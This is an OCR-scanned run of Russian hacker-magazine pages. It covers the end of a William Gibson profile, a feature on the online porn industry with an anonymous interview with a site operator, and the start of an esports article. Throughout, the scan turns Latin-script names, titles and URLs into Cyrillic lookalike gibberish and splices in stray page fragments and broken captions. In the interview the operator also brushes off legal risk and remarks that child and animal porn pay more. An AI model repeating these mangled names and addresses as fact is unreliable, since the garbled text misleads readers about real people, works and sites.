бессмертных человеческих клеток рака. За разработчиком чипов 
охотится самый богатый человек на планете — Джозеф Вайрек, 
рассчитывающий с их помощью обрести бессмертие. Соипі 2его 
— псевдоним юного хакера Бобби Ньюмарка, мечтающего од- 
нажды стать величайшим киберковбоем. Во время одного из сво- 
их взломов парень попадает в крупные неприятности и рискует 
жизнью. Но его спасают жрецы виртуального культа Боа, называ- 
ющие себя богами ѵообоо. Так как разработчик биочипов Крис- 
тофер Митчелл является приверженцем культа, то противостоя- 
ния власти и жителей сети не миновать. 




шим военным Эрмитейж, который соглашается вылечить хакера 
за определенные хакерские услуги. Еще не зная, что задумал Эр- 
митейж, Кейс заключает сделку, втайне надеясь, что новый рабо- 
тодатель даст ему главное — деньги и доступ к передовым техно- 
логиям. В процессе выполнения задачи — кражи бесценного РЮМ- 
модуля, содержащего копию разума легендарного хакера Дикси 
Флетлайна, — Кейс и и Молли узнают о тайном прошлом Эрмитей- 
жа и встречаются с новыми персонажами: вором и наркоманом 
Питером Ревьерой, способным проецировать реалистичные голог- 
раммы, Джулиусом Дином — 135-летним контрабандистом-парано- 
иком, леди З^пе, контролирующей границы обитания систем Ис- 
кусственного Интеллекта, ѴѴіпіегтиІе — одной из систем ИИ, кото- 
рая сыграет большую роль в жизни главных героев, и, наконец, 
Нейромантом — разумной программой, стоящей у них на пути. 
Когда Гибсон писал «Нейромант», он считал, что его творение 
оценят очень немногие. К тому времени у писателей-фантастов 
сложился ряд правил, которые гарантировали успех произведе- 




Заканчивается трилогия книгой «Мона Лиза Овердрайв», вышед- 
шей в 1988 году. Она состоит из 4-х сюжетных линий, переплета- 
ющихся друг с другом. Главная героиня Мона — 16-летняя девуш- 
ка с мрачным прошлым и неопределенным будущим, оказывается 
двойником одной из главных знаменитостей международной сети 
Энджи Мишель. Это сходство хотят использовать в своих целях 
секретные организации, которые «покупают» ее у бойфренда и, с 
помощью пластической хирургии, делают из нее точную копию 
Энджи. Кому на самом деле понадобилось выдать Мону за сете- 
вую звезду и зачем, становится известно только к концу романа. 
По ходу развития событий читатель встречает старых героев: 
Молли, повзрослевшего Бобби Ньюмарка, леди ЗЗапе и узнает, 
что произошло с ними спустя несколько лет. 

ТРИЛОГИЯ ВКШСЕ 

После своей знаменитой киберпанк-трилогии, Гибсон стал все- 
мирно известным. Теперь он мог до старости почивать на лаврах, 
но он продолжил писать. И все его дальнейшие книги были очень 
ожидаемыми и становились хитами еще до своего появления. 

В 1990 году в соавторстве с известным компьютерным писателем 
Брюсом Стерлингом, Гибсон написал «Двигатель различий». Этот 
взгляд на альтернативную историю, которая могла бы произойти, 
если бы современные открытия были сделаны еще во времена 
машины Бэббиджа (1822 год), сделала популярным новый литера- 
турный жанр — стимпанк. В книге Великобритания становится 
страной номер один в мире, в то время как США распадается на 
несколько независимых штатов. А в основу сюжета легла борьба 
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между несколькими историческими персонажами за владение 
ценными компьютерными перфокартами. 

Главным трудом Уильяма Гибсона на протяжении 90-х годов стала 
трилогия Вгісіде. Для некоторых она была разочарованием, так как 
Г ибсон отошел от описания киберпанкового будущего, похождений 
компьютерных ковбоев: его новые работы были более приближен- 
ными к реальности, и скорее относились к детективному жанру. 
Первым романом из серии стал «Виртуальный свет», вышедший в 
1993 году. Главная героиня Чеветт Вашингтон работает обычным ве- 
лосипедным курьером и живет в районе закрытого моста, который 
стал раем для бездомных. В один из своих рабочих дней она похи- 
щает изящные очки, которые на самом деле оказываются новейшим 
прибором для взаимодействия с виртуальной реальностью. Найти 
пропажу поручают полицейскому Бэрри Райделлу: ему не только 
предстоит найти Чеветт, но так же открыть тайну этих очков. 

Второй роман трилогии — «Идору» (1996). Идору — это японское 
слово, произошедшее от американского «идол». Так называют 
Рей Тоэй — самую популярную музыкальную звезду Японии, кото- 
рой восхищаются все... но ее не существует. Тоэй — всего лишь 
сложная программа, написанная для исполнения песен на кон- 
цертах. Конечно, у нее есть привлекательная оболочка, она спо- 
собно поддержать разговор. Но у нее нет души. В то же время 
другая звезда японской музыки — гитарист Рез из популярной 
рок-группы — реален. И, будучи большим поклонником Тоэй, на- 
меревается жениться на ней. Такой поворот не устраивает влия- 
тельных менеджеров, которым группа Реза приносит немалые 
деньги, и они пытаются его остановить. 

В 1999 году вышел третий роман серии «Все вечеринки завтрашне- 
го дня». В нем читатель снова встречает героев из первых двух час- 
тей: копа Бэрри, виртуальную звезду Рэй Тоэй, Чеветт. Но центро- 
вым персонажем будет парень по имени Колин. Несмотря на то, что 
он живет в коробке из-под перфокарт, Колин способен повлиять на 
весь мир. В детстве над ним провели эксперимент с малоисследо- 
ванным наркотиком 5-8В, в результате чего у парня выработалась 
способность определять «нодовые переходы» в необъятных масси- 
вах сетей. Это довольно редкие явления, во время которых проис- 
ходит что-то очень важное для всего мира. Колин чувствует, что 
следующий переход произойдет очень скоро, но не знает, чем это 
может обернуться. Вместе со старыми героями, ему предстоит это 
выяснить, а также помешать могущественному миллиардеру вос- 
пользоваться ситуацией для получения неограниченной власти. 

МЕРТВ ЛИ КИБЕРПАНК? 

Последней работой Уильяма Гибсона стал роман «Распознование 
паттерна», появившийся в продаже 2 года назад. Это первая книга 
писателя, где события происходят в наши дни. В отличие от других 
произведений, рассказ здесь ведется от лица главного героя — про- 
фессионального следователя-предсказателя Кейси Поллард. В 
Лондоне, где она работает, Кейси получает выгодное предложение 
расследовать причину и источник появления в Интернете фрагмен- 
тов видео, от которого фанатеют тысячи людей. Работодатели счи- 
тают, что гениальность автора этих видеозаставок может принести 
им миллионы. Но когда Кейси приближается к разгадке, ее начина- 
ют преследовать. Неизвестные вламываются в ее квартиру, прони- 
кают в ее компьютер... Пытаясь найти ответы на свои вопросы, Кей- 
си отправляется сначала в Токио, затем в Россию, и вместе с тайной 
кинофрагментов узнает кое-что новое об исчезновении своего отца. 
Само собой, киношники не могли не заметить успеха книг Г ибсона 
и периодически пытались экранизировать его произведения. Но 
ни одна из этих попыток не была удачной. Первым печальным опы- 
том было приглашение Уильяма написать сценарий к фильму «Чу- 
жой 3». Но так как писатель не мыслил кинематографическими 
мерками, его текст приходилось постоянно править, изменять, до- 
полнять, и в итоге вообще отказались от его услуг. В 1995 году ре- 
жиссер Роберт Лонго приступил к созданию фильма по мотивам 



Гибсон впервые использовал термин «киберп- 
ространство» в своем рассказе «Сожжение 
Хром». Через несколько лет это слово прочно 
вошло в обиход и стало еще популярнее с распро- 
странением компьютеров. 

В начале 80-х, Уильям Гибсон считал, что еще 
не готов приступить к написанию полноценного | 
романа. Думал, что сможет осилить его только лет 
іерез 8. Но когда издатель спросил его, хочет ли 
он написать книгу, Гибсон ответил «да». Контракт 
был заключен в тот же день. 

Писатель несколько раз переписывал 2/3 текста 
«Нейроманга», пока не составил полное предс- 
тавление о мире и событиях, и не был окончателъ- 
но удовлетворен результатом. 

Идея киберпространства пришла к Гибсону, 
когда он увидел в витрине магазина аркадную ви- 
деоигру и представил, что на самом деле может 
происходить по ту сторону экрана. 

Большое влияние на творчество Уильяма Гибсо- 
на оказал американский писатель Томас Пинчен, 
известный своими запутанными, сложными сюже- 
тами, требующими от читателя немалой эрудиции 
и знания различных наук. А его «Гравитационная 
радуга» является любимой книгой Гибсона. 

Долгое время Гибсон не мог позволитъ себе ку- 
пить компьютер и писал свои произведения на 
старенькой пишущей машинке Неттпез 2000. 

Любимая страна писателя — Япония, он даже 
специально посещал Токио, чтобы почерпнуть 
вдохновение для своих будущих романов. 






Уильяма 
Г ибсона 



книги «Джонни Мнемоник». Сценарий к нему писал сам Гибсон. 
Но в прокате картина провалилась, хоть и получила признание 
у компьютерной молодежи. Та же судьба ждала фильм «Отель 
"Новая Роза"», в основу которого легли шпионские события из 
раннего рассказа писателя (хотя сюжет был сильно видоизменен). 
Конечно, логичнее всего было бы ожидать фильма «Нейромант», 
так как эта повесть была самой популярной и успешной у автора. 
Но единственная компания, выкупившая права на экранизацию, 
вскоре обанкротилась. Также сюжеты книг Гибсона неоднократно 
находили применение в компьютерных играх. В 1988 году компа- 
ния Іпіегріау представила асІіоп-РРО «Нейромант» для платформ 
Арріе II, С64, Атіда и РС, в которой игрок должен взламывать раз- 
ные системы и улучшать свои показатели (импланты). 

Многие считают, что с Гибсоном киберпанк родился, с ним же и 
почил. Такого воодушевления, драйва нет в произведениях других 
киберпанк-писателей. Многие пытались копировать Гибсона, но 
ничего хорошего из этого не вышло. 

Несмотря на огромную популярность, личная жизнь Уильяма Г иб- 
сона малоизвестна. Он не рассказывает о своей семье и увлече- 
ниях в интервью, ограничиваясь лишь своим творчеством. Тем не 
менее у Г ибсона есть свой официальный сайт ѵѵѵѵѵѵ.ѵѵіІІіатаіЬзоп- 
Ьоокз.сот . где можно найти веб-блог писателя, в котором он де- 
лится своими мыслями и идеями. Поклонники ждут его новых 
книг, хотя сам Гибсон заверил, что второго «Нейроманта» не бу- 
дет. «Киберпанк мертв как литературный жанр. Но я вижу в неда- 
леком будущем все то, о чем писал 20 лет назад». 

ВІЫАВУ ѴСШВ’8 ~і~ 



088 



ХАКЕР 01 /85/ 06 






Добро пожаловать в окружную больницу Чикаго, место, где 
грань между жизнью и смертью почти стёрта. Место, где 
секунда решает всё! 



■ 
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СЦЕНА 




ТЕХТ ИЛЬЯ АЛЕКСАНДРОВ / Пуа аІ@гатЫег.ш / 



ОБНАЖЕННЫЙ 

ИНТЕРНЕТ 

О ЖИЗНИ СЕТЕВОЙ ПОРНОИНДУСТРИИ 



ііКАКИЕ САЙТЫ ТЫ ПОСЕЩАЕШЬ ЧАЩЕ ВСЕГО? КТО-ТО ПРИ ЭТОМ ВОПРОСЕ 
НАЧНЕТ БОРМОТАТЬ ПРО ПОИСКОВЫЕ МАШИНЫ, КТО-ТО — ПРО ЗЕСШІТѴ-ПОРТАЛЫ, 
ДРУГИЕ ПРОСТО СМУЩЕННО ОПУСТЯТ ГЛАЗА. ЛАДНО ТЕБЕ, АМИГО, ВСЕ СВОИ. НИКТО 
НЕ БУДЕТ ОСУЖДАТЬ ТЕБЯ ЗА ПРОГУЛКИ ПО САЙТАМ XXX ТЕМАТИКИ И ЗА ПРОСМОТР 
ВСЯКИХ ИЗВРАЩЕНИЙ. УВЕРЕН, ТЫ УЖЕ НА ЭТОМ СОБАКУ СЪЕЛ. НО КОЕ-ЧТО 
НОВЕНЬКОЕ ПРО ПОРНОИНДУСТРИЮ Я ТЕБЕ ВСЕ ЖЕ РАССКАЖУ** 



СТАТИСТИКА ЗНАЕТ ВСЕ 

Уже никто не вспомнит, когда в Сети был создан первый порноре- 
сурс. Понятия «Интернет» и «порно» в общественном сознании 
тесно связаны между собой, и такое ощущение, что все эти кар- 
тинки и видеоролики появились в глобальной паутине даже рань- 
ше, чем ѴѴѴѴѴѴ. На сегодняшний день в киберпространстве суще- 
ствует порядка 4,6 миллионов сайтов «для взрослых» (посещают 
их, правда, большей частью детишки). Спрос рождает предложе- 
ние — примерно 15% пользователей регулярно посещают порно- 
порталы. Это если верить американским социологам, на самом 
деле — на порядок больше. Недавно я забрел на Иііѵѵізе.сот . эта 
контора занимается исследованием интересов веб-серферов. 
Так вот, в ноябре прошлого года услугами порносайтов пользова- 
лись 19% от всех юзеров, выходивших в ѵѵеЬ. Тогда как общая до- 
ля трех ведущих поисковиков доодіе, уаЬоо, МЗЫ составила 5,5%. 
Голые тетки в 3 раза популярней дядюшки гугля! 

Еще интересно посмотреть, в каких странах порнушка наиболее 
востребована. Больше всего развратных страничек в Г ермании (в 
зоне .бе их 1 миллион), на втором месте британцы — в доменной зо- 
не .ик 800 тысяч порноресурсов. Наша могучая держава уже давно 
не впереди всей Планеты, даже по количеству эдалт-порталов. 
Седьмое место и сто тысяч сайтов. Впрочем, цифры постоянно рас- 
тут. В надежде на большие бабки, порнобароны по всему миру 
ежедневно наполняют сеть двумя сотнями сайтов с поревом. 
Утомил тебя статистическими данными? Это все для того, чтоб 
ты понял истинные масштабы порноиндустрии. 

ЧТО И ГДЕ? 

Контент эдалт-проектов в большинстве своем навевает скуку. 
Однотипные галереи, сфабрикованные фотошопом фотографии 
голых звезд... Большинство сайтов работает по принципу плат- 
ного доступа к содержимому. Сначала пользователя заманивают 
на сайт, показывают откровенные фотографии, после чего пред- 
лагают заплатить п-ную сумму денег за просмотр остального кон- 
тента. Этот способ понятен и безумно прост в реализации. Толь- 
ко срубить бабла таким макаром с каждым днем все труднее: во- 
первых, беспрецедентное количество конкурентов, во-вторых, 
любую эротику юзер может найти на бесплатных сайтах. 



Тогда порнобароны нашли новый, гораздо более выгодный способ 
получения прибыли от интернет-порнографии — ЫѵеСат, о кото- 
ром писали в твоем любимом журнале в июне 2004 года. Напомню, 
о чем идет речь. Берут девочек-моделей, запихивают их в эроти- 
чески обставленную комнату, покупают компы и веб-камеры. Захо- 
дя на сайт лайвкэм-студии, клиент сначала общается с моделью 
(или с админом, по совместительству выполняющим обязанности 
оператора) в обычном текстовым чате, разумеется, бесплатно. 
После чего клиенту предлагают посмотреть видео. Если он согла- 
шается, на экране монитора появляется та самая модель, действи- 
ями которой можно управлять. Можно приказать тетке раздеться, 
помастурбировать... не знаю, что там еще придет в голову сред- 
нестатистическому сетевому задроту. Зрелище это не из дешевых: 
от двух до пяти баксов за минуту «общения». Деньги на этом деле 
рубят сумасшедшие. Да и конкуренции гораздо меньше: органи- 
зовать студию, найти моделей, закупиться аппаратурой — все это 
требует огромных денежных и временных затрат. 

Еще можно вспомнить продажу дисков с порнофильмами. Вот, по- 
жалуй, и все виды асЫЪпродукции. Но где этой продукции только 
нет. Порно теперь даже в ѴѴАР. На 2005 год 12 самых популярных 
ресурсов «Мобильного Интернета» были ХХХ-направленности. 
Фактически, порносайты — единственное, чем интересен юзерам 
ѴѴАР. Кроме них, посещаются разве что порталы с полифоничес- 
кими мелодиями, но их рейтинги — ничто в сравнении с порнуш- 
ными. Народ не смущает даже крошечное и не всегда качествен- 
ное изображение дисплеев сотовых телефонов. В этой области 
уже появились свои порнобароны. Самый известный из них — 
Патрик МакАдам, владелец более сотни ѴѴАР-сайтов, принося- 
щих, по его утверждению, больше прибыли, чем основная долж- 
ность — руководство ИТ-подразделением крупной компании. 
Помимо ѵѵеЬ-ресурсов, огромные залежи порно находятся в ІРС, 
ІІзеЫеІ, пиринговых сетях. Самая популярная иерархия — аІГзех — 
насчитывает более 453 конференций, трафик в которых просто не 
поддается исчислению. Есть даже специальные программы, позво- 
ляющие оптимизировать процесс скачивания эдалта из ІІзеІХІеІ Нап- 
ример, знаменитый РісШге Зискег, ІРС и р2р менее популярны среди 
любителей порнушки, зато, как уверили меня некоторые товарищи, 
самый свежак находится именно там, и уже оттуда поступает в ѵѵеЬ. 
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ПОРНОМАНЫ ЗАБИВАЮТ НА ВСЕ: СЕМЬЮ, ДЕТЕЙ, РАБОТУ, 
И ЗАЦИКЛИВАЮТСЯ ТОЛЬКО НА ОДНОМ — 
ПРОСМОТРЕ ПОРНОГРАФИИ. 

СОЦИОЛОГИ СЧИТАЮТ, ЧТО ПРИЧИНА ЭТОГО В ТОМ, что 
В ПОРНОФИЛЬМАХ ЖЕНЩИНА ВСЕГДА ГОТОВА К СЕКСУ, 
НИКОГДА НЕ КРИТИКУЕТ ПАРТНЕРА, ЧТО ЗНАЧИТЕЛЬНО 
ПОВЫШАЕТ МУЖСКУЮ САМООЦЕНКУ. 

ХОТЯ МНЕ КАЖЕТСЯ, ЧТО ПСИХИЧЕСКИ НЕУРАВНОВЕШЕННЫЙ 
ЧЕЛОВЕК С ПРОБЛЕМАМИ В ЖИЗНИ МОЖЕТ УДАРИТЬСЯ ХОТЬ В 
ПОРНОГРАФИЮ, ХОТЬ В КОМПЬЮТЕРНЫЕ ИГРЫ, ХОТЬ В 
ПОПЫТКИ СВЕСТИ СЧЕТЫ С ЖИЗНЬЮ. 

ПРОБЛЕМА НЕ В ПОРНОСАЙТАХ, ПРОБЛЕМА В МОЗГАХ, 
А ТОЧНЕЕ В ИХ ОТСУТСТВИИ У НЕКОТОРЫХ ЛЮДЕЙ. 
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ХОСТИНГ для 
АсІиІГпроектов — 
суЬегаде.сот 







А0Ш.ТѴѴЕВМА5ТЕВІМС 5СНООІ. 

Ты уже знаешь, что на порно можно 
прекрасно заработать. Майкл Хайес из 
АсУіѴУеЬтазіегЗсІпооІ.сот всего за 1 40 
вечнозеленых президентов расскажет 
тебе все, что нужно для успешной карьеры порноолигарха. Отк- 
рытые Майклом в 2000 году курсы уже закончило 2200 человек. 
Как утверждает сам Хайес, для прохождения обучения не нужно 
никакого опыта. На сайте размещены видеоуроки типа наших ви- 
зуал-хаков, только там орудуют не хакеры, а порномастера. 
Хайес долгое время работал на один веб-портал, но когда сайт 
закрыли, перед ним встала серьезная проблема: как зарабаты- 
вать на жизнь. В какой-то момент безработному дизайнеру приш- 
ла в голову мысль, что при огромной популярности порносайтов, 
никто не додумался поставить обучение АбиІіѴѴеЬМазІегингу на 
коммерческую основу. Не исключено, что Майкл Хайес через па- 
ру лет откроет первую в истории школу киллеров или курсы на- 
чинающих путан. 

Впрочем, чтобы стать владельцем своего порноресурса, ни- 
каких особых знаний не нужно. К твоим услугам и бесплат- 
ные хостинги (достаточно назвать Ніаіпрогпо.сот ). и биллин- 
говые системы, и шаблоны для создания портала... Закон? 
Об этой стороне вопроса мы еще поговорим. Для начала 
приведу в пример такую личность, как Сергей Прянишников. 
Известный русский порнорежиссер, владелец зехѵібео.ги . 



форма для постинга 
сообщений на 
ѵѵѵѵѵѵ.Ііпихзискз.огд 





биллинговая сис- 




тема іЬіІІ.сот — 




друг каждого 


Гу гѴ-і 


порнодилера 








Организация управления доменным прост- 
ранством Интернета (сокращенно — 

ІСАЫЫ) решила создать доменную зону .ххх, 
предназначенную специально для эдалт- 
сайтов. Новая зона позволит фильтрам не 
допускать к эротике несовершеннолетних, ведь засунуть в черный 
список всю доменную зону куда проще, чем искать ресурсы, разб- 
росанные по всем зонам Сети. Сейчас организация решает, како- 
ва будет стоимость регистрации в зоне (предположительно она 
составит 75 долларов) и какие будут накладываться ограничения 
на контент. Только не понятно, как они собираются заставить пор- 
нобаронов перетащить свои раскрученные ресурсы на новый до- 
мен и хостинг и лишиться немалого количества аудитории из-за 
поставленных заботливыми родителями фильтров. 

Ты, наверно, слышал про разбирательства из-за домена 
зех.сот . Еще в 1994 году американский предприниматель Гэ- 
ри Кримен зарегистрировал его на свое имя, но через год 
некто Стивен Коэн обманным путем присвоил портал себе. Он 
представился сотрудником компании Кримена, сообщив, что 
владелец решил отказаться от использования домена. В тече- 
ние следующих 5 лет Коэн сделал зех.сот одним из самых 
популярных ресурсов Интернета с посещаемостью 25 милли- 
онов человек в день. Кримен, видя такое дело, подал на шуст- 
рого Коэна в суд, но первое дело проиграл, так как «веб-сайт 
не является собственностью, а потому украсть его невозмож- 



Школа 

порнографов. 

АсіиІІѵѵеЬтазІегзсИооІ.сот 




где продаются абиіі-фильмы. Все вышеперечисленное не по- 
мешало ему баллотироваться на пост Губернатора Санкт-Пе- 
тербурга, и его сайт, расположенный на обычном русском 
хостинге, никто закрывать не торопится. Там даже написано, 
что все содержимое можно считать эротикой, а отличать эро- 
тику от порнухи наше законодательство пока не в состоянии. 

НЕСКОЛЬКО ИСТОРИЙ ПОРНОИНДУСТРИИ 

В январе 2004 года в Сети появился сайт ЬооЫе.сот . Бубль — это по- 
исковик, предназначенный для поиска порно в Интернете, копирую- 
щий не только название (Зоодіе, но и его дизайн. Руководство 
аооаіе.сот возмутилось и потребовало немедленного прекращения 
столь вопиющего нарушения авторских прав. Создатели ЬооЫе же 
утверждают, что их детище — всего лишь невинная пародия, кроме 
того, «у любого нормального человека, исключая адвокатов, сайт 
ВооЫе вызывает улыбку». Несмотря на все старания ребят из 
Ооодіе, порнопародия до сих пор прекрасно функционирует, стала 
довольно популярной и закрываться, похоже, не собирается. 
Вообще, порно в Сети не только популярно, но даже уважаемо. 



но». Гэри не сдавался, и через некоторое время добился от 
суда очень удачного для себя приговора: Стивена Коэна обя- 
зали выплатить потерпевшей стороне 65 миллионов долларов 
компенсации. Но денег киберсквоттеру стало жалко, и он уда- 
рился в бега. Спустя пять лет он вернулся и даже подал апел- 
ляцию — мол, я эти 65 миллионов за всю жизнь не заработаю. 
Что не совсем правда, так как сайт зех.сот эксперты оцени- 
ли в 250 миллионов убитых енотов, а Стивен Коэн за пять лет 
эксплуатации портала заработал куда больше. Как бы там ни 
было, своих бабок Кримен не увидит еще долго, если вообще 
увидит. А все пользователи Сети получили еще один пример 
того, как сделать сумасшедшие деньги на киберсквоттинге. 
Сетевая порноиндустрия волнует не только борцов за нрав- 
ственность, но и других бизнесменов в этой области. Например, 
тираж журнала РепіНоизе в последние годы упал с 4,7 миллио- 
нов до 650 тысяч экземпляров в месяц. Боб Гуччионе, владелец 
журнала, считает, что в этом виноват Интернет. Бывшим читате- 
лям теперь легче выйти в Сеть и найти любую порнушку, чем по- 
купать РеШНоизе. Что делать — конкуренция... 
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САМЫЙ ПРИБЫЛЬНЫЙ БИЗНЕС — ЭТО 
ОРГАНИЗАЦИЯ ИНТЕРАКТИВНЫХ ТРАНСЛЯЦИЙ? 
ДА. ДОХОД ОТ 18 ШТУК БАКСОВ В МЕСЯЦ. 



НЕ ВСЕ КОТУ МАСЛЕНИЦА 

Но нѳ все так безоблачно в мире джепеговых теток, взрослых сайтов 
и больших денег. Компания АОІ_ недавно предъявила иск владельцам 
сетевой фирмы, проводившим по аське спам-рассылку, рекламирую- 
щую порносайты. Для бизнесменов эта история закончилась боль- 
шим штрафом и завершением карьеры в порноиндустрии. 

Первый в истории России арест за распространение порнографии 
был совершен в 2000 году в Ульяновске. Порнографом оказался 
обычный студент Ульяновского Государственного Университета, на 
которого вышли благодаря провайдерам, обнаружившим сайт в Се- 
ти. Студенту грозило до двух лет лишения свободы, но его амнисти- 
ровали. Напомню тебе, что за незаконное распространение порног- 
рафических материалов, согласно статье 242, предусмотрен штраф 
в размере от двухсот до пятисот минимальных размеров оплаты тру- 
да либо лишение свободы сроком до двух лет. 

Впрочем, порносайтостроительством занимаются не только русские 
студенты. В Тайване 13-летний мальчик был арестован за создание и 
поддержку портала, предлагающего приобретение различных сексу- 
альных услуг. Паренек уверял, что сайт создал для прикола, и не со- 
бирался совершать ничего криминального, но доблестные органы не 
прониклись: родители были вынуждены заплатить 30 000 долларов 
США (о том, что сделал папа с сыночком, опустившим его на 30 кус- 
ков, история умалчивает). 

Но это все цветочки. В США был арестован владелец порносайта, ко- 
торый предоставлял доступ к содержимому военнослужащим в Ира- 



ке в обмен на фотографии с боевых полей. Их он публиковал на сай- 
те в свободном доступе. Причем снимки явно не отличались полит- 
корректностью. Например, под фотографией трупа с вывороченны- 
ми внутренностями и мозгами красовалась надпись: «Так должен 
выглядеть каждый иракец». И таких снимков в галерее много. 27-лет- 
ний владелец сайта Крис Уилсон сейчас находится под следствием в 
тюрьме, а в свое оправдание заявил: «Снимки — это просто новый 
взгляд на войну. С их, солдат, точки зрения». Раньше на сайте не бы- 
ло ничего, кроме порноконтента, и, когда жалобы американских сол- 
дат в Ираке о слишком большой стоимости аккаунта участились, Уил- 
сон согласился предоставить им халявный доступ в обмен на скан- 
дальные фотографии. Скорее всего, Уилсон выйдет на волю в бли- 
жайшем будущем. Уголовного преступления в публикации фотогра- 
фий нет, хотя Криса могут осудить за распространение порева. По- 
везло Уилсону, что живет он в Америке, а не в Китае. Вот уж где не 
любят порнушку и порнодилеров! 

В качестве примера можно привести китайского товарища Чена, кото- 
рый зарабатывал на жизнь распространением лазерных дисков с пор- 
нографией. В КНР за моральную чистоту жителей поднебесной борют- 
ся со всей жестокостью, поэтому Чен получил 19 лет лишения свободы. 
Г оворят, парню крупно повезло, так как могли ведь и к стенке поставить. 
Теперь китайским владельцам порносайтов, чья посещаемость более 
250 000 человек в день, грозит пожизненное заключение. Причем ор- 
ганы отнюдь не бездействуют: за последнее время закрыто более се- 
миста порталов и арестовано около 244 человек. 



РАЗГОВОР ПО ДУШАМ 

Найти человека для интервью к этой 
статье было довольно сложно. Бизнес нелегаль- 
ный, и светиться в популярных журналах лицам 
из порноиндустрии не хочется. Тем не менее, 
потусовавшись в широко известных узкому кру- 
гу сетевых местах, я нашел того, кого искал. 
Мой собеседник согласился ответить на вопро- 
сы при условии сохранения его анонимности. 
Илья Александров: Привет. Как тебя 
представить читателям? Пара фраз о себе. 
Антон: Как представить? Хм.. Антон, пусть бу- 
дет Антон. О себе могу сказать, что живу в Пи- 
тере, мне 20 с небольшим лет, женат. На жизнь, 
как ты уже знаешь, зарабатываю путем созда- 
ния и поддержки порносайтов в Интернете. 
И.А.: Как давно ты в этом бизнесе? Как 
пришла в голову мысль заняться этим? 

А.: Порядка четырех лет. В универе я подра- 
батывал созданием ѵѵеЬ-сайтов и однажды 
получил заказ на разработку сайта АбиІІ-нап- 
равленности. Заказчик хотел, чтобы я взял на 
себя и организацию биллинга, и покупку хос- 
тинга. Так я получил полное представление о 
том, что нужно для занятия порнобизнесом. 
Следующий порносайт я делал уже для себя. 
И.А.: Самый прибыльный бизнес — это ор- 
ганизация интерактивных трансляций? 

А.: Да. Доход от 18 штук баксов в месяц. Прав- 
да, я этим никогда не занимался. Г ораздо боль- 
ше проблем требует нефиговых начальных 
вложений. Кроме того, на порядок выше риск. 
Так что я уж лучше дронам изображения голых 
баб и видеоролики впаривать буду. 

И .А.: Ты владеешь несколькими порносайтами? 
А.: Около сорока различного содержания. 
Можно сказать, своего рода сеть. С одного 



единственного сайта много денег не будет. 
И.А.: В каких доменных зонах чаще всего разме- 
щают подобные сайты? Где покупаешь хостинг? 
А.: Везде, кроме .ш, лучший вариант, конеч- 
но — .сот. Хостинг обычно берут у контор, 
которые специализируются именно на эдал- 
те. Например, абиШпозТги — онлайновое 
представительство фирмы из США. 

И.А.: Не боишься органов? 

А.: Нет. Если не светиться, соблюдать осто- 
рожность, то вероятность того, что тебя по- 
вяжут, фактически равна нулю. Кроме того, 
как ты докажешь, что на моих порталах выло- 
жена порнография, а не эротика? А эротика 
— искусство, за нее в тюрьму не сажают. 
И.А.: Сколько времени отнимает у тебя 
твой бизнес? 

А.: Часа по 3 — 4 в день. Сюда входит и об- 
новление галерей с изображением, и изуче- 
ние конкурирующих сайтов, и все остальное. 
Хотя когда только начинал дело, у меня не 
было ни минуты свободного времени. 

И.А.: Как насчет моральной стороны вопроса? 
А.: Не стыдно ли мне, что я растлеваю людей 
порнографией? Нет, не стыдно. Посещать или 
не посещать порносайты — личное дело каждо- 
го. Если народ хочет видеть порнографию, ее 
ему дадут. А если я могу сделать на этом деньги, 
то почему должен оставаться в стороне? 

И .А.: Что является залогом популярности сайтов? 
А.: Во-первых, хорошая раскрутка. Во-вто- 
рых, оригинальность контента. В Сети милли- 
оны порносайтов с одинаковым содержани- 
ем, дашь людям эксклюзив — у тебя будет 
большая фора перед конкурентами. 

И.А.: Ты говорил про раскрутку. 

Можно подробней? 



А.: В целом раскрутка та же, что и у обычных 
порталов. Баннерные сети, регистрация в по- 
исковиках. Плюс достижение или покупка, пер- 
вых мест в различных порнотопах, спам-рас- 
сылках. Присутствует и накрутка посещаемос- 
ти, но чаще все делается относительно честно. 
И.А.: Детское порно на твоих порталах при- 
сутствует? 

А.: Нет. Детишек, зверюшек и прочего не 
держим. Рискованно, а также похабно и гру- 
бо. Хотя на этом зарабатывают больше, чем 
на порнушке «традиционного» содержания. 
И.А.: Не хотел бы поработать «специалис- 
том по продвижению порносайтов»? 

А.: Многие сейчас действительно занимаются 
раскруткой порноресурсов, продвигая новых 
людей в бизнесе, причем стоит это отнюдь не 
дешево. Но у меня и так хватает конкурентов, 
чтобы создавать их собственными руками. :) 
И.А.: Что касается «новых людей в бизне- 
се», им сейчас что-нибудь светит? 

А.: Конечно, места под солнцем давно забиты. 
И чтобы сейчас срубить бабла на порноинду- 
стрии, надо очень постараться. Но это вполне 
реально, хотя и нужно быть готовым к боль- 
шим финансовым затратам и тяжелому труду. 
И.А.: Спасибо, Антон. Удачи тебе в твоем не- 
легком деле! 

З.Ы. 

Отведенное мне место заканчивается, наде- 
юсь, ты не пожалел времени, затраченного на 
чтение статьи. Порнография, как бы там ни 
было, надолго вошла в нашу жизнь. Я не вижу 
в этом ничего хорошего, как, впрочем, и пло- 
хого. Но одно знаю точно: реальные девушки 
возбуждают меня куда больше виртуальных. 

ВІЫАВУ ѴОІЖ’8 Т 
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ІІКИБЕРСПОРТ — СПОРТ БУДУЩЕГО! — МНОГООБЕЩАЮЩЕ ГЛАСИЛИ 
ПРЕСС-РЕЛИЗЫ ТУРНИРОВ ПО КОМПЬЮТЕРНЫМ ИГРАМ НЕСКОЛЬКО 
ЛЕТ ТОМУ НАЗАД. СЕГОДНЯ ПОДОБНЫЕ МЕРОПРИЯТИЯ УЖЕ НЕ РЕД- 
КОСТЬ, И САМИ КИБЕРСПОРТСМЕНЫ МОГУТ С УВЕРЕННОСТЬЮ СКА- 
ЗАТЬ: КИБЕРСПОРТ — СПОРТ НАСТОЯЩЕГО ВРЕМЕНИ. ВСЕ БОЛЬШЕ МО- 
ЛОДЫХ ЛЮДЕЙ ОТДАЮТ ПРЕДПОЧТЕНИЕ ИМЕННО ЕМУ, А НЕ ТРАДИЦИ- 
ОННОМУ СПОРТУ, И ОН ПРОДОЛЖАЕТ РАЗВИВАТЬСЯ БЫСТРЫМИ ТЕМПА- 
МИ, ПРИ ЭТОМ ВСЕ ЕЩЕ НАХОДИТСЯ В СТАДИИ ЗАРОЖДЕНИЯ. ПОТЕН- 
ЦИАЛ К РАЗВИТИЮ ОГРОМЕН, А ПРИДАНИЕ ТЕРМИНУ «КОМПЬЮТЕРНЫЙ 
СПОРТ» ОФИЦИАЛЬНОГО СТАТУСА — ЛИШЬ ВОПРОС ВРЕМЕНИ 33 
